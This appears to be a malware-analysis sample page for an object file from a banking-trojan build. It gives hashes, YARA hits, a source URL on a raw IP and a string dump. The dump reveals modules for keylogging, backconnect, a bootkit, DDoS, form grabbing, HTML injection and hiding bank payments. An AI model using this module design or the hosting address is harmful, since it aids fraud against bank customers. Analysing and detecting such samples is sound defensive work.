Sample details: 18d53adfd756f390c22086b2227c614e --

Hashes
MD5: 18d53adfd756f390c22086b2227c614e
SHA1: bb24e89bbc7376992ea1dba5126f14723366ef15
SHA256: 938eca5ef849929ffe5c30094219c85fc7196178e7b1f01872368a14f8f6a508
SSDEEP: 1536:W7KzEboySdkGa3M/dWwUYwwgeuzSSzDOSnkC+GBJt4+wKSOZygNu9:W7KzEboySyGa3OUgOzSYBJi+wK+
Details
File Type: 80386
Yara Hits
CuckooSandbox/shellcode | CuckooSandbox/embedded_win_api | YRP/maldoc_getEIP_method_1 | YRP/domain | YRP/contentis_base64 |
Source
http://103.68.190.250/Sources//Advance/BJWJ/Builds/BOT_PLUG/Objs/Release%20DEBUGCONFIG/BBSCBank.obj
Strings
		.drectve
.debug$S
.rdata
0@.rdata
0@.text
`.debug$S
B.rdata
0@.text
`.debug$S
B.text
`.debug$S
B.text
`.debug$S
B.text
`.debug$S
B.text
`.debug$S
B.text
`.debug$S
B.text
`.debug$S
B.rdata
0@.text
`.debug$S
B.text
`.debug$S
B.text
`.debug$S
B.text
`.debug$S
B.text
`.debug$S
B.rdata
0@.text
`.debug$S
B.text
`.debug$S
B.text
`.debug$S
B.text
`.debug$S
B.text
`.debug$S
B.text
`.debug$S
B.text
`.debug$S
B.text
`.debug$S
B.text
`.debug$S
B.text
`.debug$S
B.rdata
0@.text
`.debug$S
B.text
`.debug$S
B.text
`.debug$S
B.text
`.debug$S
B.text
`.debug$S
B.text
`.debug$S
B.text
`.debug$S
B.text
`.debug$S
B.text
`.debug$S
B.text
`.debug$S
B.text
`.debug$S
B.text
`.debug$S
B.text
`.debug$S
B.text
`.debug$S
B.text
`.debug$S
B.text
`.debug$S
B.text
`.debug$S
B.text
`.debug$S
B.text
`.debug$S
B.text
`.debug$S
B.text
`.debug$S
B.text
`.debug$S
B.text
`.debug$S
B.text
`.debug$S
B.rdata
0@.rdata
0@.text
`.debug$S
B.text
`.debug$S
B.text
`.debug$S
B.rdata
0@.rdata
0@.rdata
0@.text
`.debug$S
B.rdata
0@.rdata
0@.rdata
@@.rdata
0@.rdata
0@.rdata
0@.rdata
0@.text
`.debug$S
B.text
`.debug$S
B.rdata
0@.text
`.debug$S
B.rdata
0@.rdata
0@.rdata
0@.rdata
@@.rdata
0@.rdata
0@.rdata
0@.rdata
0@.rdata
0@.rdata
0@.text
`.debug$S
B.rdata
0@.rdata
0@.rdata
0@.rdata
0@.rdata
0@.rdata
0@.rdata
0@.rdata
0@.rdata
0@.text
`.debug$S
B.rdata
0@.rdata
0@.rdata
@@.rdata
0@.rdata
0@.rdata
@@.rdata
0@.rdata
0@.rdata
@@.rdata
0@.rdata
0@.rdata
0@.text
`.debug$S
B.rdata
0@.text
`.debug$S
B.rdata
0@.rdata
0@.rdata
0@.rdata
0@.rdata
0@.rdata
0@.rdata
0@.rdata
0@.text
`.debug$S
B.text
`.debug$S
B.rdata
0@.text
`.debug$S
B.rdata
0@.rdata
0@.rdata
0@.text
`.debug$S
B.debug$T
B   /DEFAULTLIB:"uuid.lib" /DEFAULTLIB:"uuid.lib" /DEFAULTLIB:"LIBCMT" /DEFAULTLIB:"OLDNAMES" 
e:\Projects\progs\Petrosjan\BJWJ\Builds\BOT_PLUG\Objs\Release DEBUGCONFIG\BBSCBank.obj
Microsoft (R) Optimizing Compiler
e:\Projects\progs\Petrosjan\BJWJ\Builds\BOT_PLUG
D:\Program Files\Microsoft Visual Studio 9.0\VC\bin\cl.exe
-O1 -Oi -Ie:\Projects\progs\Petrosjan\BJWJ\Builds\BootkitDropper -Ie:\Projects\progs\Petrosjan\BJWJ\Source\Misc -Ie:\Projects\progs\Petrosjan\BJWJ\Source\Common -Ie:\Projects\progs\Petrosjan\BJWJ\Source\Core -Ie:\Projects\progs\Petrosjan\BJWJ\Source -Ie:\Projects\progs\Petrosjan\BJWJ\Builds\BOT_PLUG\Modules -Ie:\Projects\progs\Petrosjan\BJWJ\include -Ie:\Projects\progs\Petrosjan\BJWJ\Source\RuBnk -DWIN32 -DNDEBUG -D_WINDOWS -D_USRDLL -DWHITE_JOE_DLL_EXPORTS -DDEBUGCONFIG -DBOTPLUG -D_WINDLL -FD -MT -GS- -Gy -GR- -Fo"e:\Projects\progs\Petrosjan\BJWJ\Builds\BOT_PLUG\Objs\Release DEBUGCONFIG\\" -Fd"e:\Projects\progs\Petrosjan\BJWJ\Builds\BOT_PLUG\Objs\Release DEBUGCONFIG\vc90.pdb" -W3 -c -Zi -TP -nologo -errorreport:prompt -I"D:\Program Files\Microsoft Visual Studio 9.0\VC\include" -I"D:\Program Files\Microsoft Visual Studio 9.0\VC\atlmfc\include" -I"C:\Program Files\Microsoft SDKs\Windows\v6.0A\include" -I"C:\Program Files\Microsoft SDKs\Windows\v6.0A\include" -X
..\..\Source\RuBnk\BBSCBank.cpp
e:\Projects\progs\Petrosjan\BJWJ\Builds\BOT_PLUG\Objs\Release DEBUGCONFIG\vc90.pdb
fcmRead
fcmWrite
fcmReadWrite
fcmCreate
PARSE_CANONICALIZE
PARSE_FRIENDLY
PARSE_SECURITY_URL
PARSE_ROOTDOCUMENT
PARSE_DOCUMENT
PARSE_ENCODE
PARSE_DECODE
PARSE_PATH_FROM_URL
PARSE_URL_FROM_PATH
PARSE_MIME
PARSE_SERVER
PARSE_SCHEMA
PARSE_SITE
PARSE_DOMAIN
PARSE_LOCATION
PARSE_SECURITY_DOMAIN
PARSE_ESCAPE
PSU_DEFAULT
ApiCacheSize
BINDSTATUS_FINDINGRESOURCE
QUERY_IS_INSTALLEDENTRY
BINDSTATUS_CONNECTING
BINDSTATUS_REDIRECTING
BINDSTATUS_BEGINDOWNLOADDATA
BINDSTATUS_ENDDOWNLOADDATA
BINDSTATUS_BEGINDOWNLOADCOMPONENTS
BINDSTATUS_INSTALLINGCOMPONENTS
BINDSTATUS_ENDDOWNLOADCOMPONENTS
BINDSTATUS_USINGCACHEDCOPY
BINDSTATUS_SENDINGREQUEST
BINDSTATUS_MIMETYPEAVAILABLE
BINDSTATUS_CACHEFILENAMEAVAILABLE
restAccounts
BINDSTATUS_BEGINSYNCOPERATION
restFixeds
BINDSTATUS_ENDSYNCOPERATION
sizeRestFixeds
BINDSTATUS_BEGINUPLOADDATA
hidePayments
runHideReplacement
BINDSTATUS_ENDUPLOADDATA
BINDSTATUS_PROTOCOLCLASSID
BINDSTATUS_ENCODING
BINDSTATUS_VERIFIEDMIMETYPEAVAILABLE
BINDSTATUS_CLASSINSTALLLOCATION
BINDSTATUS_DECODING
BINDSTATUS_LOADINGMIMEHANDLER
BINDSTATUS_CONTENTDISPOSITIONATTACH
SYS_WIN32
SYS_MAC
BINDSTATUS_CLSIDCANINSTANTIATE
BINDSTATUS_IUNKNOWNAVAILABLE
COOKIE_STATE_REJECT
BINDSTATUS_DIRECTBIND
BINDSTATUS_RAWMIMETYPE
BINDSTATUS_PROXYDETECTING
BINDSTATUS_ACCEPTRANGES
CBank::pHandlerSQLDriverConnectA
BINDSTATUS_COOKIE_SENT
BINDSTATUS_COMPACT_POLICY_RECEIVED
BINDSTATUS_COOKIE_SUPPRESSED
CBank::pHandlerSQLPrepareA
BINDSTATUS_COOKIE_STATE_ACCEPT
BINDSTATUS_COOKIE_STATE_REJECT
BINDSTATUS_COOKIE_STATE_PROMPT
CBank::pHandlerSQLExecDirectA
CBank::pHandlerSQLExecute
BINDSTATUS_PERSISTENT_COOKIE_RECEIVED
BINDSTATUS_CACHECONTROL
BINDSTATUS_CONTENTDISPOSITIONFILENAME
BINDSTATUS_MIMETEXTPLAINMISMATCH
strODBCConnect
BINDSTATUS_PUBLISHERAVAILABLE
BINDSTATUS_DISPLAYNAMEAVAILABLE
domain
FEATURE_OBJECT_CACHING
FEATURE_ZONE_ELEVATION
FEATURE_MIME_HANDLING
FEATURE_MIME_SNIFFING
FEATURE_WINDOW_RESTRICTIONS
FEATURE_WEBOC_POPUPMANAGEMENT
FEATURE_BEHAVIORS
FEATURE_DISABLE_MK_PROTOCOL
FEATURE_LOCALMACHINE_LOCKDOWN
FEATURE_SECURITYBAND
FEATURE_RESTRICT_ACTIVEXINSTALL
FEATURE_RESTRICT_FILEDOWNLOAD
FEATURE_ADDON_MANAGEMENT
FEATURE_PROTOCOL_LOCKDOWN
FEATURE_HTTP_USERNAME_PASSWORD_DISABLE
FEATURE_SAFE_BINDTOOBJECT
FEATURE_UNC_SAVEDFILECHECK
FEATURE_GET_URL_DOM_FILEPATH_UNENCODED
TKIND_INTERFACE
FEATURE_TABBED_BROWSING
FEATURE_SSLUX
TKIND_DISPATCH
FEATURE_DISABLE_NAVIGATION_SOUNDS
FEATURE_DISABLE_LEGACY_COMPRESSION
TKIND_ALIAS
FEATURE_FORCE_ADDR_AND_STATUS
FEATURE_XMLHTTP
FEATURE_DISABLE_TELNET_PROTOCOL
FEATURE_FEEDS
FEATURE_BLOCK_INPUT_PROMPTS
CIP_DISK_FULL
CIP_ACCESS_DENIED
CIP_NEWER_VERSION_EXISTS
CHANGEKIND_ADDMEMBER
CIP_OLDER_VERSION_EXISTS
CIP_NAME_CONFLICT
CHANGEKIND_DELETEMEMBER
CIP_TRUST_VERIFICATION_COMPONENT_MISSING
CHANGEKIND_SETNAMES
CIP_EXE_SELF_REGISTERATION_TIMEOUT
CHANGEKIND_SETDOCUMENTATION
CHANGEKIND_GENERAL
CIP_UNSAFE_TO_ABORT
CHANGEKIND_INVALIDATE
CIP_NEED_REBOOT
CHANGEKIND_CHANGEFAILED
Uri_PROPERTY_STRING_START
Uri_PROPERTY_AUTHORITY
Uri_PROPERTY_DISPLAY_URI
Uri_PROPERTY_STRING_LAST
Uri_PROPERTY_ZONE
Uri_HOST_DNS
Uri_HOST_IPV4
CC_CDECL
CC_MSCPASCAL
CC_PASCAL
CC_MACPASCAL
CC_STDCALL
CC_FPFASTCALL
CC_SYSCALL
CC_MPWCDECL
CC_MPWPASCAL
COR_VERSION_MAJOR_V2
VAR_STATIC
VIDEORECORD_DEFAULT_PORT
VIDEO_FULLSCREEN
VIDEO_ALWAYS
IdleShutdown
URLZONE_INTRANET
NoAccess
ReadWrite
URLZONEREG_DEFAULT
URLZONEREG_HKLM
	'BANKING_SIGNAL_FILE_HASH
BOT_UID
SA_Yes
SA_Maybe
SA_NoAccess
SA_Read
SA_Write
SA_ReadWrite
INTERNET_SCHEME_FTP
INTERNET_SCHEME_RES
ProcessUnknown
VT_BSTR
VT_DISPATCH
HostCheckInterval
VT_RECORD
VT_RESERVED
TYSPEC_MIMETYPE
TYSPEC_FILENAME
TYSPEC_PROGID
TYSPEC_PACKAGENAME
DESCKIND_IMPLICITAPPOBJ
BINDSTRING_POST_COOKIE
BINDSTRING_FLAG_BIND_TO_OBJECT
hmUnknown
EStrFakeDllInstaller
EStrFakeDllCBankFlag
CBankReplacement
CBankFlagUpdate
CBankRestFixed
DLL_KERNEL32
NODE_INVALID
DLL_SHLWAPI
NODE_ELEMENT
NODE_ATTRIBUTE
NODE_TEXT
NODE_CDATA_SECTION
NODE_ENTITY_REFERENCE
DLL_ODBC32
NODE_ENTITY
NODE_COMMENT
NODE_DOCUMENT
NODE_DOCUMENT_TYPE
NODE_DOCUMENT_FRAGMENT
XMLELEMTYPE_DOCUMENT
tagPARAMDESC
tagPARAMDESCEX
SQLINTEGER
tagBINDPTR
LPPARAMDESCEX
CALLCONV
STRING
BINDPTR
TYPEKIND
FUNCKIND
PARAMDESC
tagTLIBATTR
_SYSTEM_STRINGS
ELEMDESC
PMemBlockList
VARIANTARG
SAFEARRAYBOUND
PDWORD
tagELEMDESC
DESCKIND
_PEB_FREE_BLOCK
PHANDLE
TYPEDESC
KSPIN_LOCK
tagEXCEPINFO
PMemBlock
_NT_TIB
tagSTATSTG
VARKIND
_RTL_DRIVE_LETTER_CURDIR
LPOLESTR
tagFUNCDESC
NTSTATUS
tagIDLDESC
_UNICODE_STRING
TMemory
PPEBLOCKROUTINE
LONGLONG
tagApplicationType
HMEMORYMODULE
tagCABSTR
PIDMSI_STATUS_VALUE
LONG_PTR
PROPVAR_PAD3
LPVOID
CBank::RestAccount
CBank::RestAccountFixed
CBank::HidePayment
STRBUF::TStrRec
TRequest
FUNCDESC
TBotApplication
tagCACLSID
tagCADBL
SQLCHAR
_RTL_BITMAP
SIZE_T
BOOLEAN
PTEXT_INFO
KAFFINITY
HREFTYPE
TRequestList
tagTYPEKIND
UNICODE_STRING
tagDESCKIND
tagCACY
tagSYSKIND
_STRING
tagXMLEMEM_TYPE
OLECHAR
tagVARKIND
PPEB_LDR_DATA
EXCEPINFO
LPCSTR
_FILETIME
ULONGLONG
VARDESC
LPCOLESTR
LPCRITICAL_SECTION
IUnknown
MEMBERID
tagARRAYDESC
THTTPResponseRec
DOUBLE
tagVARDESC
TGrabber
tagBINDSTRING
DECIMAL
SQLUSMALLINT
CLIENT_ID
SYSKIND
__MIDL_IUri_0001
TListTemplate<void *>
TBotSocket
BSTRBLOB
tagCAH
_tagQUERYOPTION
TBotEvent
THTTPMethod
_TP_CALLBACK_ENVIRON
_TP_CALLBACK_ENVIRON::<unnamed-type-u>
_TP_CALLBACK_ENVIRON::<unnamed-type-u>::<unnamed-type-s>
ITypeComp
TProcessType
tagCAUI
tagCAFILETIME
tagDISPPARAMS
VARIANT_BOOL
tagSAFEARRAY
PROPVARIANT
LIST_ENTRY
TMemBlock
CAPROPVARIANT
tagTYSPEC
HCRYPTKEY
TMultiPartData
TMultiPartData::TReadPart
TPlugin
tagTYPEDESC
tagCLIPDATA
PSYSTEM_STRINGS
RTL_DRIVE_LETTER_CURDIR
CADATE
tagCAC
THTTPResponse
MemPtr<512>
IDLDESC
PTP_CALLBACK_INSTANCE
tagTYPEATTR
THTTPChunks
THTTPChunks::TState
tagSAFEARRAYBOUND
PWCHAR
HWND__
tagBLOB
THTMLInjectData
LPTSTR
tagURLZONE
_LARGE_INTEGER
_LARGE_INTEGER::<unnamed-type-u>
ReplacesCorHdrNumericDefines
_ULARGE_INTEGER
_ULARGE_INTEGER::<unnamed-type-u>
_PEB_LDR_DATA
ISequentialStream
PRTL_BITMAP
VARENUM
SQLHENV
_CLIENT_ID
PPEB_FREE_BLOCK
tagCAI
TIMESTAMP_STRUCT
tagCAUB
tagFUNCKIND
PCUWSTR
LPSAFEARRAY
TRequestEvent
_URLZONEREG
RTL_CRITICAL_SECTION
VideoLog
THTTPRequest
TListNotifyEvent
tagBSTRBLOB
TLIBATTR
LARGE_INTEGER
IEnumSTATSTG
tagPROCESSENTRY32W
VARTYPE
TBotCollectionItem
TP_VERSION
ITypeLib
TBotStrings
tagDEC
TValue
CLIPDATA
TYPEATTR
tagVARIANT
DISPID
PRTL_CRITICAL_SECTION
vc_attributes::YesNoMaybe
vc_attributes::PreAttribute
vc_attributes::PostAttribute
vc_attributes::AccessType
TIfobsOnlineGrabber
USHORT
THTMLInject
tagCADATE
TBotStream
PRequestList
tagCAUH
ULARGE_INTEGER
IRecordInfo
TKeyLogger
_RTL_CRITICAL_SECTION
ldiv_t
CASCODE
TDataBlock
PPROCESS_PARAMETERS
PRTL_CRITICAL_SECTION_DEBUG
PRequest
CAFILETIME
_CURDIR
TProcessPipe
SQLHANDLE
DISPPARAMS
LPVARIANT
SQLHWND
va_list
TMemoryDLL
INVOKEKIND
STATSTG
SQLRETURN
__MIDL_IUri_0002
_TEXT_INFO
HANDLE
tagCALPWSTR
NT_TIB
HCRYPTPROV
_tagPSUACTION
PROPVAR_PAD1
CALPSTR
HCRYPTHASH
PTP_POOL
LPBYTE
SAFEARRAY
PProcessPipe
tagCABOOL
_RTL_CRITICAL_SECTION_DEBUG
IStorage
TWinCrypt
CALPWSTR
PUWSTR
TString<char>
TBotList
tagTIMESTAMP_STRUCT
TBotObject
PStrings
_LIST_ENTRY
tagCALPSTR
TEventContainer
ITypeInfo
LPWSTR
LPVERSIONEDSTREAM
IStream
size_t
PHTTPResponseRec
CURDIR
_PROCESS_PARAMETERS
tagPROPVARIANT
INTERNET_SCHEME
InternetCookieState
CABSTRBLOB
TBotFileStream
tagVersionedStream
SQLSMALLINT
SQLUINTEGER
TCryptHTTP
FILETIME
tagCAFLT
tagCACLIPDATA
TDllId
tagBINDSTATUS
VARIANT
IDispatch
tagDOMNodeType
tagShutdownType
tagCAL
tagCAPROPVARIANT
fwsprintfA
tagCABSTRBLOB
THTMLInjectList
PTP_SIMPLE_CALLBACK
tagCHANGEKIND
CACLIPDATA
PTP_CLEANUP_GROUP_CANCEL_CALLBACK
TValues
PTP_CALLBACK_ENVIRON
PTP_CLEANUP_GROUP
CACLSID
PROCESSENTRY32W
ULONG_PTR
SQLHSTMT
STRUTILS<char>
LPCTSTR
PROPVAR_PAD2
_ldiv_t
__MIDL_ICodeInstall_0001
SQLHDBC
TMultiPartDataItem
HRESULT
TBotCollection
tagCALLCONV
_tagINTERNETFEATURELIST
CABOOL
string
_tagPARSEACTION
TStrEnum
tagCASCODE
tagCAUL
CABSTR
wn:ph>
Iakytp[O:ac
Y./Pxx
6rUo6A
YZz%.J	
e:\projects\progs\petrosjan\bjwj\source\misc\grabber.h
c:\program files\microsoft sdks\windows\v6.0a\include\mmsystem.h
e:\projects\progs\petrosjan\bjwj\source\misc\certgrab.h
e:\projects\progs\petrosjan\bjwj\source\common\task.h
c:\program files\microsoft sdks\windows\v6.0a\include\msxml.h
c:\program files\microsoft sdks\windows\v6.0a\include\cguid.h
e:\projects\progs\petrosjan\bjwj\source\common\cabpacker.h
c:\program files\microsoft sdks\windows\v6.0a\include\fci.h
c:\program files\microsoft sdks\windows\v6.0a\include\winnetwk.h
d:\program files\microsoft visual studio 9.0\vc\include\fcntl.h
c:\program files\microsoft sdks\windows\v6.0a\include\nb30.h
e:\projects\progs\petrosjan\bjwj\source\core\botdebug.h
e:\projects\progs\petrosjan\bjwj\source\rubnk\finam.h
c:\program files\microsoft sdks\windows\v6.0a\include\rpcdcep.h
e:\projects\progs\petrosjan\bjwj\source\core\bothttp.h
c:\program files\microsoft sdks\windows\v6.0a\include\sqlext.h
c:\program files\microsoft sdks\windows\v6.0a\include\winefs.h
e:\projects\progs\petrosjan\bjwj\source\rubnk\bss.h
e:\projects\progs\petrosjan\bjwj\source\core\botsocket.h
c:\program files\microsoft sdks\windows\v6.0a\include\sql.h
e:\projects\progs\petrosjan\bjwj\source\common\unhook.h
c:\program files\microsoft sdks\windows\v6.0a\include\sqltypes.h
c:\program files\microsoft sdks\windows\v6.0a\include\mcx.h
e:\projects\progs\petrosjan\bjwj\source\rubnk\rubnk.h
e:\projects\progs\petrosjan\bjwj\builds\bot_plug\modules\modules.h
e:\projects\progs\petrosjan\bjwj\source\common\internetexplorer.h
d:\program files\microsoft visual studio 9.0\vc\include\io.h
c:\program files\microsoft sdks\windows\v6.0a\include\wininet.h
d:\program files\microsoft visual studio 9.0\vc\include\vadefs.h
c:\program files\microsoft sdks\windows\v6.0a\include\winnt.h
d:\program files\microsoft visual studio 9.0\vc\include\ctype.h
e:\projects\progs\petrosjan\bjwj\source\rubnk\bbscbank.cpp
c:\program files\microsoft sdks\windows\v6.0a\include\wincon.h
e:\projects\progs\petrosjan\bjwj\source\core\dllloader.h
e:\projects\progs\petrosjan\bjwj\source\common\wndutils.h
e:\projects\progs\petrosjan\bjwj\source\core\botutils.h
c:\program files\microsoft sdks\windows\v6.0a\include\guiddef.h
e:\projects\progs\petrosjan\bjwj\source\core\inject.h
c:\program files\microsoft sdks\windows\v6.0a\include\oaidl.h
e:\projects\progs\petrosjan\bjwj\source\core\bothosts.h
c:\program files\microsoft sdks\windows\v6.0a\include\rpc.h
c:\program files\microsoft sdks\windows\v6.0a\include\winerror.h
e:\projects\progs\petrosjan\bjwj\source\misc\cyberplatdll.h
c:\program files\microsoft sdks\windows\v6.0a\include\rpcdce.h
c:\program files\microsoft sdks\windows\v6.0a\include\wingdi.h
e:\projects\progs\petrosjan\bjwj\source\common\opera.h
c:\program files\microsoft sdks\windows\v6.0a\include\winbase.h
e:\projects\progs\petrosjan\bjwj\source\rubnk\sber.h
c:\program files\microsoft sdks\windows\v6.0a\include\tlhelp32.h
c:\program files\microsoft sdks\windows\v6.0a\include\pshpack8.h
e:\projects\progs\petrosjan\bjwj\source\core\splice.h
e:\projects\progs\petrosjan\bjwj\source\common\keepalive.h
c:\program files\microsoft sdks\windows\v6.0a\include\sqlucode.h
e:\projects\progs\petrosjan\bjwj\source\core\installer.h
e:\projects\progs\petrosjan\bjwj\source\common\botconfig.h
c:\program files\microsoft sdks\windows\v6.0a\include\pshpack4.h
d:\program files\microsoft visual studio 9.0\vc\include\string.h
e:\projects\progs\petrosjan\bjwj\source\rubnk\java_patcher.h
c:\program files\microsoft sdks\windows\v6.0a\include\winsock.h
e:\projects\progs\petrosjan\bjwj\source\rubnk\javaclient2015saver.h
c:\program files\microsoft sdks\windows\v6.0a\include\winreg.h
e:\projects\progs\petrosjan\bjwj\source\common\keylogger.h
e:\projects\progs\petrosjan\bjwj\source\rubnk\tiny.h
c:\program files\microsoft sdks\windows\v6.0a\include\propidl.h
c:\program files\microsoft sdks\windows\v6.0a\include\ole2.h
e:\projects\progs\petrosjan\bjwj\source\common\hostsautoupdate.h
c:\program files\microsoft sdks\windows\v6.0a\include\objbase.h
e:\projects\progs\petrosjan\bjwj\source\core\dbgtemplates.h
e:\projects\progs\petrosjan\bjwj\source\common\videorecorder.h
e:\projects\progs\petrosjan\bjwj\source\common\universalkeylogger.h
d:\program files\microsoft visual studio 9.0\vc\include\stdlib.h
e:\projects\progs\petrosjan\bjwj\source\common\firefox.h
e:\projects\progs\petrosjan\bjwj\source\core\botclasses.h
d:\program files\microsoft visual studio 9.0\vc\include\limits.h
c:\program files\microsoft sdks\windows\v6.0a\include\winspool.h
c:\program files\microsoft sdks\windows\v6.0a\include\poppack.h
e:\projects\progs\petrosjan\bjwj\source\misc\ftpsniffer.h
e:\projects\progs\petrosjan\bjwj\source\common\requests.h
e:\projects\progs\petrosjan\bjwj\source\core\crypt.h
c:\program files\microsoft sdks\windows\v6.0a\include\prsht.h
e:\projects\progs\petrosjan\bjwj\source\misc\coocksol.h
c:\program files\microsoft sdks\windows\v6.0a\include\winver.h
c:\program files\microsoft sdks\windows\v6.0a\include\tvout.h
c:\program files\microsoft sdks\windows\v6.0a\include\imm.h
c:\program files\microsoft sdks\windows\v6.0a\include\rpcnterr.h
c:\program files\microsoft sdks\windows\v6.0a\include\commdlg.h
c:\program files\microsoft sdks\windows\v6.0a\include\rpcasync.h
c:\program files\microsoft sdks\windows\v6.0a\include\rpcnsi.h
e:\projects\progs\petrosjan\bjwj\source\core\plugins.h
c:\program files\microsoft sdks\windows\v6.0a\include\winperf.h
c:\program files\microsoft sdks\windows\v6.0a\include\shellapi.h
c:\program files\microsoft sdks\windows\v6.0a\include\dlgs.h
c:\program files\microsoft sdks\windows\v6.0a\include\winscard.h
c:\program files\microsoft sdks\windows\v6.0a\include\urlmon.h
c:\program files\microsoft sdks\windows\v6.0a\include\wtypes.h
c:\program files\microsoft sdks\windows\v6.0a\include\winsmcrd.h
c:\program files\microsoft sdks\windows\v6.0a\include\rpcndr.h
c:\program files\microsoft sdks\windows\v6.0a\include\rpcnsip.h
c:\program files\microsoft sdks\windows\v6.0a\include\winnls.h
c:\program files\microsoft sdks\windows\v6.0a\include\servprov.h
e:\projects\progs\petrosjan\bjwj\source\core\odbc.h
c:\program files\microsoft sdks\windows\v6.0a\include\bcrypt.h
e:\projects\progs\petrosjan\bjwj\source\misc\killos_reboot.h
c:\program files\microsoft sdks\windows\v6.0a\include\stralign.h
c:\program files\microsoft sdks\windows\v6.0a\include\lzexpand.h
c:\program files\microsoft sdks\windows\v6.0a\include\ddeml.h
c:\program files\microsoft sdks\windows\v6.0a\include\specstrings.h
e:\projects\progs\petrosjan\bjwj\source\misc\backconnect.h
c:\program files\microsoft sdks\windows\v6.0a\include\wincrypt.h
c:\program files\microsoft sdks\windows\v6.0a\include\specstrings_adt.h
c:\program files\microsoft sdks\windows\v6.0a\include\pshpack2.h
c:\program files\microsoft sdks\windows\v6.0a\include\reason.h
c:\program files\microsoft sdks\windows\v6.0a\include\winsvc.h
c:\program files\microsoft sdks\windows\v6.0a\include\ncrypt.h
e:\projects\progs\petrosjan\bjwj\source\core\botcore.h
e:\projects\progs\petrosjan\bjwj\source\core\config.h
c:\program files\microsoft sdks\windows\v6.0a\include\specstrings_strict.h
e:\projects\progs\petrosjan\bjwj\source\core\ntdll.h
c:\program files\microsoft sdks\windows\v6.0a\include\psapi.h
c:\program files\microsoft sdks\windows\v6.0a\include\specstrings_undef.h
e:\projects\progs\petrosjan\bjwj\source\core\ntstatus.h
c:\program files\microsoft sdks\windows\v6.0a\include\basetsd.h
e:\projects\progs\petrosjan\bjwj\source\core\utils.h
e:\projects\progs\petrosjan\bjwj\source\core\strings.h
e:\projects\progs\petrosjan\bjwj\source\core\memory.h
e:\projects\progs\petrosjan\bjwj\source\rubnk\bootkit.h
e:\projects\progs\petrosjan\bjwj\source\misc\keylogsystems.h
c:\program files\microsoft sdks\windows\v6.0a\include\winioctl.h
c:\program files\microsoft sdks\windows\v6.0a\include\oleauto.h
e:\projects\progs\petrosjan\bjwj\source\core\getapi.h
c:\program files\microsoft sdks\windows\v6.0a\include\winuser.h
e:\projects\progs\petrosjan\bjwj\source\rubnk\ibanksystem.h
e:\projects\progs\petrosjan\bjwj\source\misc\bsssign.h
c:\program files\microsoft sdks\windows\v6.0a\include\rpcsal.h
c:\program files\microsoft sdks\windows\v6.0a\include\cderr.h
c:\program files\microsoft sdks\windows\v6.0a\include\ktmtypes.h
e:\projects\progs\petrosjan\bjwj\source\rubnk\avangard.h
c:\program files\microsoft sdks\windows\v6.0a\include\dde.h
e:\projects\progs\petrosjan\bjwj\source\rubnk\bsssendfile.h
e:\projects\progs\petrosjan\bjwj\source\rubnk\ifobs.h
e:\projects\progs\petrosjan\bjwj\source\rubnk\bbscbank.h
c:\program files\microsoft sdks\windows\v6.0a\include\windows.h
c:\program files\microsoft sdks\windows\v6.0a\include\sdkddkver.h
d:\program files\microsoft visual studio 9.0\vc\include\excpt.h
e:\projects\progs\petrosjan\bjwj\source\common\pipes.h
e:\projects\progs\petrosjan\bjwj\source\core\strimplementation.cpp
d:\program files\microsoft visual studio 9.0\vc\include\crtdefs.h
d:\program files\microsoft visual studio 9.0\vc\include\sal.h
e:\projects\progs\petrosjan\bjwj\source\rubnk\yandex.h
e:\projects\progs\petrosjan\bjwj\source\core\botcrypthttp.h
c:\program files\microsoft sdks\windows\v6.0a\include\objidl.h
d:\program files\microsoft visual studio 9.0\vc\include\codeanalysis\sourceannotations.h
e:\projects\progs\petrosjan\bjwj\source\rubnk\rafa.h
e:\projects\progs\petrosjan\bjwj\source\misc\ddos.h
e:\projects\progs\petrosjan\bjwj\source\rubnk\azconfig.h
e:\projects\progs\petrosjan\bjwj\source\rubnk\ifobsonline.h
e:\projects\progs\petrosjan\bjwj\source\misc\hunter.h
e:\projects\progs\petrosjan\bjwj\source\rubnk\javaconfig.h
e:\projects\progs\petrosjan\bjwj\source\misc\javaappletgrabbers.h
d:\program files\microsoft visual studio 9.0\vc\include\stdarg.h
e:\projects\progs\petrosjan\bjwj\source\core\strconsts.h
e:\projects\progs\petrosjan\bjwj\source\core\listtemplate.cpp
c:\program files\microsoft sdks\windows\v6.0a\include\pshpack1.h
c:\program files\microsoft sdks\windows\v6.0a\include\windef.h
c:\program files\microsoft sdks\windows\v6.0a\include\oleidl.h
c:\program files\microsoft sdks\windows\v6.0a\include\unknwn.h
c:\program files\microsoft sdks\windows\v6.0a\include\inaddr.h
$T0 .raSearch = $eip $T0 ^ = $esp $T0 4 + =
$T0 .raSearch = $eip $T0 ^ = $esp $T0 4 + = $ebx $T0 4 - ^ =
$T0 $ebp = $eip $T0 4 + ^ = $ebp $T0 ^ = $esp $T0 8 + = $L $T0 .cbSavedRegs - = $P $T0 8 + .cbParams + =
$T0 $ebp = $eip $T0 4 + ^ = $ebp $T0 ^ = $esp $T0 8 + = $L $T0 .cbSavedRegs - = $P $T0 8 + .cbParams + = $ebx $T0 24 - ^ =
$T0 $ebp = $eip $T0 4 + ^ = $ebp $T0 ^ = $esp $T0 8 + = $L $T0 .cbSavedRegs - = $P $T0 8 + .cbParams + = $ebx $T0 40 - ^ =
$T0 $ebp 116 + = $eip $T0 4 + ^ = $ebp $T0 ^ = $esp $T0 8 + = $L $T0 .cbSavedRegs - = $P $T0 8 + .cbParams + =
$T0 $ebp 116 + = $eip $T0 4 + ^ = $ebp $T0 ^ = $esp $T0 8 + = $L $T0 .cbSavedRegs - = $P $T0 8 + .cbParams + = $ebx $T0 200 - ^ =
$T0 $ebp = $eip $T0 4 + ^ = $ebp $T0 ^ = $esp $T0 8 + = $L $T0 .cbSavedRegs - = $P $T0 8 + .cbParams + = $ebx $T0 544 - ^ =
$T0 $ebp = $eip $T0 4 + ^ = $ebp $T0 ^ = $esp $T0 8 + = $L $T0 .cbSavedRegs - = $P $T0 8 + .cbParams + = $ebx $T0 108 - ^ =
$T0 $ebp = $eip $T0 4 + ^ = $ebp $T0 ^ = $esp $T0 8 + = $L $T0 .cbSavedRegs - = $P $T0 8 + .cbParams + = $ebx $T0 36 - ^ =
$T0 $ebp = $eip $T0 4 + ^ = $ebp $T0 ^ = $esp $T0 8 + = $L $T0 .cbSavedRegs - = $P $T0 8 + .cbParams + = $ebx $T0 324 - ^ =
$T0 $ebp = $eip $T0 4 + ^ = $ebp $T0 ^ = $esp $T0 8 + = $L $T0 .cbSavedRegs - = $P $T0 8 + .cbParams + = $ebx $T0 264 - ^ =
TBotObject::~TBotObject
TBotObject::`scalar deleting destructor'
TMemory::TMemory
TMemory::~TMemory
